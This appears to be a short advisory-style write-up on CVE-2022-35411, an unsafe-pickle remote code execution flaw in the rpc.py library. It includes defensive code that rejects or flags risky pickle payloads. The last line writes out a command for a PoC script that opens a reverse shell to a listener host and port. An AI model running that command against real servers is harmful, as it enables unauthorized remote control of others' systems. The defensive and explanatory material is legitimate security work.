rpc.py

rpc.py is a lightweight Python library designed to facilitate remote procedure calls (RPC) over a network. It enables developers to expose Python functions or methods on a server and invoke them remotely from a client, simplifying distributed application communication. The library serializes data using Python's pickle module, which allows complex objects to be sent back and forth.

rpc.py versions 0.4.2 to 0.6.0 are susceptible to an unauthenticated remote code execution (RCE) vulnerability (CVE-2022-35411). The flaw arises from unsafe deserialization of untrusted data using Python’s pickle module. Because rpc.py accepts serialized objects from clients without proper validation or authentication, an attacker can craft a malicious payload that, when deserialized by the server, executes arbitrary system commands.
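The defensive side of the deserialization issue described above, as an added example (not rpc.py's code and not the PoC): an unpickler that refuses every global lookup, plus a static opcode scan for logging or rejecting inbound bodies. The names `DataOnlyUnpickler`, `safe_loads` and `risky_opcodes` are hypothetical, and the sample bodies are constructed.

```python
import io
import pickle
import pickletools
from datetime import date

# Opcodes that import a global or call/instantiate something during loading.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD"}


class DataOnlyUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup, so only plain data loads."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data: bytes):
    """Deserialize primitives and containers only; raise on anything else."""
    return DataOnlyUnpickler(io.BytesIO(data)).load()


def risky_opcodes(data: bytes) -> set:
    """Statically list risky opcodes in a payload without executing it."""
    try:
        return {op.name for op, _arg, _pos in pickletools.genops(data)} & RISKY_OPCODES
    except Exception:
        return {"MALFORMED"}  # unparsable input is rejected as well


# Constructed sample request bodies (not captured traffic).
PLAIN_BODY = pickle.dumps({"method": "add", "args": [1, 2]})
OBJECT_BODY = pickle.dumps(date(2022, 7, 8))  # needs a global import to rebuild

if __name__ == "__main__":
    for label, body in (("plain", PLAIN_BODY), ("object", OBJECT_BODY)):
        print(label, sorted(risky_opcodes(body)))
        try:
            print("  loaded:", safe_loads(body))
        except pickle.UnpicklingError as exc:
            print("  rejected:", exc)
```

A body made only of primitives and containers loads normally; anything that needs an import or a call to rebuild is flagged by the scan and rejected by the loader before any code can run.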

A Python-based PoC is available for getting a reverse shell right away:

python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001
